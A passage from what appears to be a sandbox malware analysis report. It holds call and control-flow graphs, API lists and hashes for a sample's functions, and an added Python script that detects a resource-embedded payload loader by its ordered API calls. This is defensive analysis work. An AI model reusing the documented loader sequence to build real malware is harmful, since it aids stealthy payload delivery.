13687->13685 13690 40b9ec 13687->13690 13689 40e744 __controlfp_s 6 API calls 13688->13689 13694 40b9cd _doexit 13689->13694 13691 40d6e0 __lock 62 API calls 13690->13691 13692 40b9f3 13691->13692 13741 40b917 13692->13741 13694->12714 13698 4017cc _memcpy_s 13697->13698 13698->12718 13701 40af70 13699->13701 13700 40b84d _malloc 62 API calls 13700->13701 13701->13700 13702 40af8a 13701->13702 13703 40d2e3 __calloc_impl 6 API calls 13701->13703 13705 40af8c std::bad_alloc::bad_alloc 13701->13705 13702->12723 13703->13701 13707 40d2bd __cinit 73 API calls 13705->13707 13709 40afb2 13705->13709 13707->13709 13955 40af49 13709->13955 13710 40afca 13712 401903 lstrlenA 13711->13712 13713 4018fc 13711->13713 13967 4017e0 13712->13967 13713->12746 13716 401940 GetLastError 13718 40194b MultiByteToWideChar 13716->13718 13719 40198d 13716->13719 13717 401996 13717->12746 13720 4017e0 77 API calls 13718->13720 13719->13717 13983 401030 GetLastError 13719->13983 13721 401970 MultiByteToWideChar 13720->13721 13721->13719 13724 40af66 74 API calls 13723->13724 13725 40187c 13724->13725 13726 401885 SysAllocString 13725->13726 13727 4018a4 13725->13727 13726->13727 13727->12748 13729 40231a SafeArrayUnaccessData 13728->13729 13729->12755 13731 4019aa InterlockedDecrement 13730->13731 13736 4019df VariantClear 13730->13736 13732 4019b8 13731->13732 13731->13736 13733 4019c2 SysFreeString 13732->13733 13735 4019c9 13732->13735 13732->13736 13733->13735 13992 40aec0 13735->13992 13736->12763 13738 401571 13737->13738 13740 401582 13737->13740 13998 40afe0 13738->13998 13740->12726 13740->13740 13742 40b92c 13741->13742 13743 40b930 13741->13743 13747 40ba18 13742->13747 13743->13742 13745 40b942 _strlen 13743->13745 13750 40eeab 13743->13750 13745->13742 13760 40edfb 13745->13760 13954 40d606 LeaveCriticalSection 13747->13954 13749 40ba1f 13749->13694 13751 40eec6 13750->13751 13752 40ef2b 13750->13752 13751->13752 13753 40eecc WideCharToMultiByte 13751->13753 13754 411cba 
__calloc_crt 62 API calls 13751->13754 13755 40eeef WideCharToMultiByte 13751->13755 13759 40b6b5 ___endstdio 62 API calls 13751->13759 13763 414d44 13751->13763 13752->13745 13753->13751 13753->13752 13754->13751 13755->13751 13756 40ef37 13755->13756 13757 40b6b5 ___endstdio 62 API calls 13756->13757 13757->13752 13759->13751 13855 40ed0d 13760->13855 13764 414d76 13763->13764 13765 414d59 13763->13765 13767 414dd4 13764->13767 13809 417e7e 13764->13809 13766 40bfc1 __controlfp_s 62 API calls 13765->13766 13768 414d5e 13766->13768 13769 40bfc1 __controlfp_s 62 API calls 13767->13769 13771 40e744 __controlfp_s 6 API calls 13768->13771 13798 414d6e 13769->13798 13771->13798 13773 414db5 13775 414e12 13773->13775 13776 414de7 13773->13776 13777 414dcb 13773->13777 13775->13798 13820 414c98 13775->13820 13779 411c75 __malloc_crt 62 API calls 13776->13779 13776->13798 13780 40eeab ___wtomb_environ 119 API calls 13777->13780 13782 414df7 13779->13782 13783 414dd0 13780->13783 13782->13775 13789 411c75 __malloc_crt 62 API calls 13782->13789 13782->13798 13783->13767 13783->13775 13784 414e8f 13785 414f7a 13784->13785 13790 414e98 13784->13790 13787 40b6b5 ___endstdio 62 API calls 13785->13787 13786 414e41 13788 40b6b5 ___endstdio 62 API calls 13786->13788 13787->13798 13793 414e4b 13788->13793 13789->13775 13791 411d54 __recalloc_crt 73 API calls 13790->13791 13790->13798 13794 414e51 _strlen 13791->13794 13792 414f5e 13796 40b6b5 ___endstdio 62 API calls 13792->13796 13792->13798 13793->13794 13824 411d54 13793->13824 13794->13792 13797 411cba __calloc_crt 62 API calls 13794->13797 13794->13798 13796->13798 13799 414efb _strlen 13797->13799 13798->13751 13799->13792 13800 40ef42 _strcpy_s 62 API calls 13799->13800 13801 414f14 13800->13801 13802 414f28 SetEnvironmentVariableA 13801->13802 13805 40e61c __invoke_watson 10 API calls 13801->13805 13803 414f49 13802->13803 13804 414f52 13802->13804 13806 40bfc1 __controlfp_s 62 API calls 13803->13806 13807 40b6b5 
___endstdio 62 API calls 13804->13807 13808 414f25 13805->13808 13806->13804 13807->13792 13808->13802 13829 417dc2 13809->13829 13811 414d89 13811->13767 13811->13773 13812 414cea 13811->13812 13813 414cfb 13812->13813 13818 414d3b 13812->13818 13814 411cba __calloc_crt 62 API calls 13813->13814 13815 414d12 13814->13815 13816 414d24 13815->13816 13817 40e79a __amsg_exit 62 API calls 13815->13817 13816->13818 13836 417d6d 13816->13836 13817->13816 13818->13773 13822 414ca6 13820->13822 13821 40edfb __fassign 106 API calls 13821->13822 13822->13821 13823 414ccd 13822->13823 13823->13784 13823->13786 13827 411d5d 13824->13827 13826 411da0 13826->13794 13827->13826 13828 411d81 Sleep 13827->13828 13844 40b783 13827->13844 13828->13827 13830 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13829->13830 13831 417dd6 13830->13831 13832 40bfc1 __controlfp_s 62 API calls 13831->13832 13835 417df4 __mbschr_l 13831->13835 13833 417de4 13832->13833 13834 40e744 __controlfp_s 6 API calls 13833->13834 13834->13835 13835->13811 13837 417d7e _strlen 13836->13837 13843 417d7a 13836->13843 13838 40b84d _malloc 62 API calls 13837->13838 13839 417d91 13838->13839 13840 40ef42 _strcpy_s 62 API calls 13839->13840 13839->13843 13841 417da3 13840->13841 13842 40e61c __invoke_watson 10 API calls 13841->13842 13841->13843 13842->13843 13843->13816 13845 40b792 13844->13845 13846 40b7ba 13844->13846 13845->13846 13847 40b79e 13845->13847 13848 40b7cf 13846->13848 13851 40e56a __msize 63 API calls 13846->13851 13850 40bfc1 __controlfp_s 62 API calls 13847->13850 13849 40e34f _realloc 71 API calls 13848->13849 13854 40b7b3 _memset 13849->13854 13852 40b7a3 13850->13852 13851->13848 13853 40e744 __controlfp_s 6 API calls 13852->13853 13853->13854 13854->13827 13856 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13855->13856 13857 40ed21 13856->13857 13858 40ed42 13857->13858 13859 40ed75 13857->13859 13869 40ed2a 13857->13869 13860 40bfc1 __controlfp_s 62 API calls 13858->13860 13862 40ed99 
13859->13862 13863 40ed7f 13859->13863 13861 40ed47 13860->13861 13864 40e744 __controlfp_s 6 API calls 13861->13864 13866 40eda1 13862->13866 13867 40edb5 13862->13867 13865 40bfc1 __controlfp_s 62 API calls 13863->13865 13864->13869 13870 40ed84 13865->13870 13873 414b9e 13866->13873 13893 414b5c 13867->13893 13869->13745 13872 40e744 __controlfp_s 6 API calls 13870->13872 13872->13869 13874 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13873->13874 13875 414bb2 13874->13875 13876 414bd3 13875->13876 13878 414c06 13875->13878 13890 414bbb 13875->13890 13877 40bfc1 __controlfp_s 62 API calls 13876->13877 13879 414bd8 13877->13879 13880 414c10 13878->13880 13881 414c2a 13878->13881 13885 40e744 __controlfp_s 6 API calls 13879->13885 13882 40bfc1 __controlfp_s 62 API calls 13880->13882 13883 414c34 13881->13883 13884 414c49 13881->13884 13886 414c15 13882->13886 13898 417c1d 13883->13898 13888 414b5c ___crtCompareStringA 95 API calls 13884->13888 13885->13890 13889 40e744 __controlfp_s 6 API calls 13886->13889 13891 414c63 13888->13891 13889->13890 13890->13869 13891->13890 13892 40bfc1 __controlfp_s 62 API calls 13891->13892 13892->13890 13894 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13893->13894 13895 414b6f 13894->13895 13914 4147ec 13895->13914 13899 417c33 13898->13899 13909 417c58 ___ascii_strnicmp 13898->13909 13900 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 13899->13900 13901 417c3e 13900->13901 13902 417c43 13901->13902 13903 417c78 13901->13903 13904 40bfc1 __controlfp_s 62 API calls 13902->13904 13905 417c82 13903->13905 13913 417caa 13903->13913 13906 417c48 13904->13906 13907 40bfc1 __controlfp_s 62 API calls 13905->13907 13908 40e744 __controlfp_s 6 API calls 13906->13908 13910 417c87 13907->13910 13908->13909 13909->13890 13911 40e744 __controlfp_s 6 API calls 13910->13911 13911->13909 13912 4168fc 97 API calls __tolower_l 13912->13913 13913->13909 13913->13912 13915 414818 CompareStringW 13914->13915 13920 41482f strncnt 13914->13920 
13916 41483b GetLastError 13915->13916 13915->13920 13916->13920 13917 40ce09 __atodbl_l 5 API calls 13918 414b5a 13917->13918 13918->13869 13919 414a95 13921 417a20 ___ansicp 86 API calls 13919->13921 13920->13919 13922 4148a4 13920->13922 13936 414881 13920->13936 13923 414abb 13921->13923 13924 414962 MultiByteToWideChar 13922->13924 13927 4148e6 GetCPInfo 13922->13927 13922->13936 13925 414b1c CompareStringA 13923->13925 13928 417a69 ___convertcp 69 API calls 13923->13928 13923->13936 13932 414982 13924->13932 13924->13936 13926 414b3a 13925->13926 13925->13936 13929 40b6b5 ___endstdio 62 API calls 13926->13929 13930 4148f7 13927->13930 13927->13936 13931 414ae0 13928->13931 13933 414b40 13929->13933 13930->13924 13930->13936 13935 417a69 ___convertcp 69 API calls 13931->13935 13931->13936 13937 40b84d _malloc 62 API calls 13932->13937 13945 41499f __crtCompareStringA_stat 13932->13945 13938 40b6b5 ___endstdio 62 API calls 13933->13938 13934 4149d9 MultiByteToWideChar 13939 4149f2 MultiByteToWideChar 13934->13939 13953 414a83 13934->13953 13940 414b01 13935->13940 13936->13917 13937->13945 13938->13936 13942 414a09 13939->13942 13939->13953 13943 414b16 13940->13943 13944 414b0a 13940->13944 13941 4147ae __freea 62 API calls 13941->13936 13947 414a1f __crtCompareStringA_stat 13942->13947 13949 40b84d _malloc 62 API calls 13942->13949 13943->13925 13946 40b6b5 ___endstdio 62 API calls 13944->13946 13945->13934 13945->13936 13946->13936 13948 414a53 MultiByteToWideChar 13947->13948 13947->13953 13950 414a66 CompareStringW 13948->13950 13951 414a7d 13948->13951 13949->13947 13950->13951 13952 4147ae __freea 62 API calls 13951->13952 13952->13953 13953->13941 13954->13749 13961 40d0f5 13955->13961 13958 40cd39 13959 40cd6e RaiseException 13958->13959 13960 40cd62 13958->13960 13959->13710 13960->13959 13962 40d115 _strlen 13961->13962 13966 40af59 13961->13966 13963 40b84d _malloc 62 API calls 13962->13963 13962->13966 13964 40d128 13963->13964 13965 40ef42 
_strcpy_s 62 API calls 13964->13965 13964->13966 13965->13966 13966->13958 13968 4017f3 13967->13968 13969 4017e9 EntryPoint 13967->13969 13970 401805 13968->13970 13971 4017fb EntryPoint 13968->13971 13969->13968 13972 40180e EntryPoint 13970->13972 13973 401818 13970->13973 13971->13970 13972->13973 13974 40183e 13973->13974 13977 40b783 __recalloc 72 API calls 13973->13977 13980 401844 13973->13980 13975 40b6b5 ___endstdio 62 API calls 13974->13975 13975->13980 13981 40182d 13977->13981 13978 40186d MultiByteToWideChar 13978->13716 13978->13717 13979 40184e EntryPoint 13979->13980 13980->13978 13980->13979 13985 40b743 13980->13985 13981->13980 13982 401834 EntryPoint 13981->13982 13982->13974 13984 401044 EntryPoint 13983->13984 13986 40e231 __calloc_impl 62 API calls 13985->13986 13987 40b75d 13986->13987 13988 40bfc1 __controlfp_s 62 API calls 13987->13988 13991 40b779 13987->13991 13989 40b770 13988->13989 13990 40bfc1 __controlfp_s 62 API calls 13989->13990 13989->13991 13990->13991 13991->13980 13993 40b6b5 _doexit 13992->13993 13994 40b73d _doexit 13993->13994 13995 40b714 HeapFree 13993->13995 13994->13736 13995->13994 13996 40b727 13995->13996 13997 40bfc1 __controlfp_s 62 API calls 13996->13997 13997->13994 13999 40aff8 13998->13999 14000 40b01f __VEC_memcpy 13999->14000 14001 40b027 13999->14001 14000->14001 14001->13740 14003 4104e0 _doexit 6 API calls 14002->14003 14004 40ea5c __init_pointers __initp_misc_winsig 14003->14004 14019 41393d 14004->14019 14007 41046e __encode_pointer 6 API calls 14008 40ea98 14007->14008 14008->12787 14010 40d56f 14009->14010 14011 41389c __alloc_osfhnd InitializeCriticalSectionAndSpinCount 14010->14011 14012 40d59d 14010->14012 14011->14010 14012->12777 14012->12797 14014 4105a2 14013->14014 14018 4105ae 14013->14018 14015 4104e9 __decode_pointer 6 API calls 14014->14015 14015->14018 14016 4105d0 14016->14016 14017 4105c2 TlsFree 14017->14016 14018->14016 14018->14017 14020 41046e __encode_pointer 6 API calls 
14019->14020 14021 40ea8e 14020->14021 14021->14007 14024 41265c 14022->14024 14026 4126c9 14024->14026 14028 416836 14024->14028 14025 4127c7 14025->12820 14025->12821 14026->14025 14027 416836 72 API calls _parse_cmdline 14026->14027 14027->14026 14031 4167e3 14028->14031 14032 40ec86 _LocaleUpdate::_LocaleUpdate 72 API calls 14031->14032 14033 4167f6 14032->14033 14033->14024 14035 40e8ea _doexit 14034->14035 14036 40d6e0 __lock 62 API calls 14035->14036 14037 40e8f1 14036->14037 14039 4104e9 __decode_pointer 6 API calls 14037->14039 14043 40e9aa __initterm 14037->14043 14041 40e928 14039->14041 14041->14043 14045 4104e9 __decode_pointer 6 API calls 14041->14045 14042 40e9f2 _doexit 14042->12826 14051 40e9f5 14043->14051 14050 40e93d 14045->14050 14046 40e9e9 14047 40e7ee _doexit 3 API calls 14046->14047 14047->14042 14048 4104e9 6 API calls __decode_pointer 14048->14050 14049 4104e0 6 API calls _doexit 14049->14050 14050->14043 14050->14048 14050->14049 14052 40e9d6 14051->14052 14053 40e9fb 14051->14053 14052->14042 14055 40d606 LeaveCriticalSection 14052->14055 14056 40d606 LeaveCriticalSection 14053->14056 14055->14046 14056->14052

Control-flow Graph

control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 20 401c98-401c9a 16->20 18 401c7d-401c83 17->18 19 401c8f-401c91 17->19 18->16 22 401c85-401c8d 18->22 19->20 23 401cb0-401cce call 401650 20->23 24 401c9c-401caf CloseHandle 20->24 22->14 22->19 34 401cd0-401cd4 23->34 29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 36 401cf0-401cf2 34->36 37 401cd6-401cd8 34->37 42 401cf5-401cf7 36->42 40 401cda-401ce0 37->40 41 401cec-401cee 37->41 44 401f33-401f5d call 401560 38->44 45 401f73-401f75 39->45 46 401f6b-401f72 39->46 40->36 47 401ce2-401cea 40->47 41->42 42->24 43 401cf9-401d09 Module32Next 42->43 43->7 48 401d0f 43->48 44->39 50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 51 401f77-401f8d call 401560 45->51 46->45 47->34 47->41 52 401d10-401d2e call 401650 48->52 50->5 87 4021aa-4021c0 50->87 51->50 61 401d30-401d34 52->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 68 401d55-401d57 63->68 66 401d3a-401d40 64->66 67 401d4c-401d4e 64->67 66->63 70 401d42-401d4a 66->70 67->68 68->24 71 401d5d-401d7b call 401650 68->71 70->61 70->67 77 401d80-401d84 71->77 78 401da0-401da2 77->78 79 401d86-401d88 77->79 83 401da5-401da7 78->83 81 401d8a-401d90 79->81 82 401d9c-401d9e 79->82 
81->78 85 401d92-401d9a 81->85 82->83 83->24 86 401dad-401dbd Module32Next 83->86 85->77 85->82 86->7 86->52 89 4021c6-4021ca 87->89 90 40246a-402470 87->90 89->90 93 4021d0-402217 call 4018f0 89->93 91 402472-402475 90->91 92 40247a-402480 90->92 91->92 92->5 95 402482-402487 92->95 98 40221d-40223d 93->98 99 40244f-40245f 93->99 95->5 98->99 104 402243-402251 98->104 99->90 100 402461-402467 call 40b6b5 99->100 100->90 104->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 104->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-402352 call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 128 402354-402355 SafeArrayDestroy 122->128 129 40235b-402361 122->129 123->122 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 133 402377-402379 131->133 134 40237b 131->134 135 40237d-4023a2 call 4018d0 SafeArrayCreateVector 133->135 134->135 139 4023a4-4023a9 call 40ad90 135->139 140 4023ae-4023b4 135->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99
APIs
• OleInitialize.OLE32(00000000), ref: 004019FD
• _getenv.LIBCMT ref: 00401ABA
• GetCurrentProcessId.KERNEL32 ref: 00401ACD
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
• Module32First.KERNEL32 ref: 00401C48
• CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
• Module32Next.KERNEL32(00000000,?), ref: 00401D02
• Module32Next.KERNEL32(00000000,?), ref: 00401DB6
• CloseHandle.KERNEL32(00000000), ref: 00401DC4
• GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
• FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
• LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
• LockResource.KERNEL32(00000000), ref: 00401EA7
• SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
• _malloc.LIBCMT ref: 00401EBA
• _memset.LIBCMT ref: 00401EDD
• SizeofResource.KERNEL32(00000000,?), ref: 00401F02
Strings
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
• String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
• API String ID: 1430744539-2962942730
• Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
• Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
• Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
• Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
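The five function entries in this part of the report are not equally useful for detection. Only 004019F0 carries loader logic: it snapshots its own module list (CreateToolhelp32Snapshot with the TH32CS_SNAPMODULE value 0x8 shown as the first argument), locates a resource with FindResourceA / LoadResource / LockResource / SizeofResource, copies it into a _malloc'd buffer, and later resolves imports with LoadLibraryA / GetProcAddress before building SAFEARRAY and VARIANT arguments. The entries that follow match MSVC CRT and COM helper code rather than malware logic: 0040AF66 is an operator new style wrapper (malloc retry, then std::bad_alloc and __CxxThrowException@8), 00401870 wraps SysAllocString, 0040D534 is CRT heap initialisation (HeapCreate(0, 0x1000, 0)), and the IsDebuggerPresent / SetUnhandledExceptionFilter(NULL) / UnhandledExceptionFilter / TerminateProcess(GetCurrentProcess(), 0xC0000409) routine is the CRT's stack-cookie failure handler (0xC0000409 is STATUS_STACK_BUFFER_OVERRUN), not an anti-debug check. A behavioural rule should therefore key on the ordered call sequence of 004019F0. The following Python script, added here and not part of the Joe Sandbox report or its tooling, parses the report's text form of a control-flow graph and checks whether some path from the entry block issues that sequence in order; SAMPLE_CFG is constructed input, an excerpt of the 004019F0 graph with block text copied verbatim and side blocks (the module-walk loop, the SafeArray tail) and their edges left out.

```python
"""Parse a Joe Sandbox control_flow_graph dump and test an ordered API signature.

Added example, not part of the Joe Sandbox report or its tooling. Grammar of the
dump as used here: "<id> <start>[-<end>] <labels...>" opens a basic block,
"call <addr>" inside a block is an internal call, "<api> * N" repeats the
previous API N times, any other word is an API name, and "<a>-><b>" is an edge.
SAMPLE_CFG is constructed input: an excerpt of the 004019F0 graph (block text
copied verbatim, side blocks and their edges omitted).
"""
import re
from collections import deque
from typing import Dict, List, Sequence, Set, Tuple

HEX_RANGE = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Resource-embedded payload loader with run-time import resolution, in the order
# the 004019F0 blocks show it. Other calls may sit between the steps.
RESOURCE_LOADER_SIG: Sequence[str] = (
    "CreateToolhelp32Snapshot", "Module32First",
    "FindResourceA", "LoadResource", "LockResource", "SizeofResource",
    "LoadLibraryA", "GetProcAddress",
)

SAMPLE_CFG = (
    "control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e "
    "5 40248a-402496 0->5 "
    "6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 "
    "7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource "
    "LockResource SizeofResource call 40b84d call 40af66 6->7 "
    "27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 "
    "29 401ef3-401f1a call 401300 SizeofResource 27->29 28->29 "
    "38 401f1c-401f2f 29->38 39 401f5f-401f69 29->39 "
    "44 401f33-401f5d call 401560 38->44 44->39 "
    "45 401f73-401f75 39->45 46 401f6b-401f72 39->46 46->45 "
    "50 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 "
    "call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 45->50 "
    "51 401f77-401f8d call 401560 45->51 51->50 50->5 "
    "87 4021aa-4021c0 50->87 "
    # kept only to exercise the "* N" repeat syntax; unreachable in this excerpt
    "144 4023bc-402417 VariantClear * 2 call 4019a0"
)


class Block:
    def __init__(self, bid: int, start: int) -> None:
        self.bid, self.start = bid, start
        self.apis: List[str] = []   # API names in address order
        self.calls: List[int] = []  # internal call targets
        self.succ: List[int] = []   # successor block ids


def parse_cfg(text: str) -> Dict[int, Block]:
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks: Dict[int, Block] = {}
    edges: List[Tuple[int, int]] = []
    cur = None
    i = 0
    while i < len(toks):
        t = toks[i]
        m = EDGE.match(t)
        if m:
            edges.append((int(m[1]), int(m[2])))
        elif t.isdigit() and i + 1 < len(toks) and HEX_RANGE.match(toks[i + 1]):
            cur = Block(int(t), int(toks[i + 1].split("-")[0], 16))
            blocks[cur.bid] = cur
            i += 1                                   # range token consumed
        elif cur is None:
            raise ValueError(f"label {t!r} before any block header")
        elif t == "call":
            cur.calls.append(int(toks[i + 1], 16))
            i += 1
        elif t == "*":
            cur.apis.extend([cur.apis[-1]] * (int(toks[i + 1]) - 1))
            i += 1
        else:
            cur.apis.append(t)
        i += 1
    for a, b in edges:  # attach last: an edge may name a block defined later
        blocks[a].succ.append(b)
    return blocks


def path_calls_in_order(blocks: Dict[int, Block], entry: int,
                        sig: Sequence[str]) -> bool:
    """True if some path from `entry` meets sig[0], sig[1], ... in that order.

    BFS over (block, steps matched) states: loops terminate, and a step is only
    satisfied by a call that lies after the previous step on the same path.
    """
    seen: Set[Tuple[int, int]] = set()
    queue = deque([(entry, 0)])
    while queue:
        bid, k = queue.popleft()
        if (bid, k) in seen:
            continue
        seen.add((bid, k))
        for api in blocks[bid].apis:
            if k < len(sig) and api == sig[k]:
                k += 1
        if k == len(sig):
            return True
        queue.extend((s, k) for s in blocks[bid].succ)
    return False
```

Calling `path_calls_in_order(parse_cfg(SAMPLE_CFG), 0, RESOURCE_LOADER_SIG)` returns True for the excerpt, while the reversed pair `("GetProcAddress", "LoadLibraryA")` returns False, which is the point of matching along paths rather than over the unordered set of imports: a sample that merely imports both APIs does not satisfy the rule. The same parser accepts the full graph text for 004019F0 or any other function in the report.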

Control-flow Graph

Control-flow graph for 0040AF66 (basic blocks 40af66-40afca; the rendered graph is not reproduced). Block 40af7d-40af88 calls 40b84d (_malloc); on failure 40af70-40af7b calls 40d2e3 and either retries or falls into 40af8c-40af98, which leads to 40af9a-40afb2 (calls 40aefc, 40d2bd) and 40afb3-40afca (calls 40af49, 40cd39); on success 40af8a-40af8b returns.
APIs
• _malloc.LIBCMT ref: 0040AF80
  • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
  • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
  • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
• std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
  • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
• std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
• __CxxThrowException@8.LIBCMT ref: 0040AFC5
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
• String ID:
• API String ID: 1411284514-0
• Opcode ID: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
• Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
• Opcode Fuzzy Hash: 2a036851afa6ddc1d7df3bddf1a8d8bff45cbcbf2885913663491285a515d732
• Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Control-flow Graph

Control-flow graph for 00401870 (basic blocks 401870-4018c9; the rendered graph is not reproduced). Entry 401870-401883 calls 40af66; 401885-4018a2 calls SysAllocString, with 4018a4-4018a6 and 4018a8-4018ad (call 40ad90) on the failure path leading to 4018b2; both paths join at 4018b4-4018b8, which ends at 4018c4-4018c9 either directly or via 4018ba-4018bf (call 40ad90).
APIs
  • Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80
• SysAllocString.OLEAUT32 ref: 00401898
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: AllocString_malloc
• String ID:
• API String ID: 959018026-0
• Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction ID: c2922591c351a4c461934d9b8210169c8be4224f150a02a6988c85a72df9e820
• Opcode Fuzzy Hash: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
• Instruction Fuzzy Hash: BEF02073501322A7E3316B658841B47B6E8DF80B28F00823FFD44BB391D3B9C85082EA

Control-flow Graph

Control-flow graph for 0040D534 (basic blocks 40d534-40d563; the rendered graph is not reproduced): 40d534-40d556 calls HeapCreate and branches to 40d558-40d559 or 40d55a-40d563.
APIs
• HeapCreate.KERNEL32(00000000,00001000,00000000), ref: 0040D549
Memory Dump Source
• Source File: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1572297626.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1572297626.000000000054A000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_ymafvvdS.jbxd
Yara matches
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction ID: a29dbb507fbbbc11cf477c5ad410ace9233c9b691e3651c0b65acef059567112
• Opcode Fuzzy Hash: b92e553731a4154449cde6b8e59536b0b0aa674871376bfeaf174e1f515a675d
• Instruction Fuzzy Hash: E8D05E36A54348AADB11AFB47C08B623BDCE388396F404576F80DC6290F678D641C548
APIs
• IsDebuggerPresent.KERNEL32 ref: 004136F4
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
• UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
• GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
• TerminateProcess.KERNEL32(00000000), ref: 00413737
Memory Dump Source
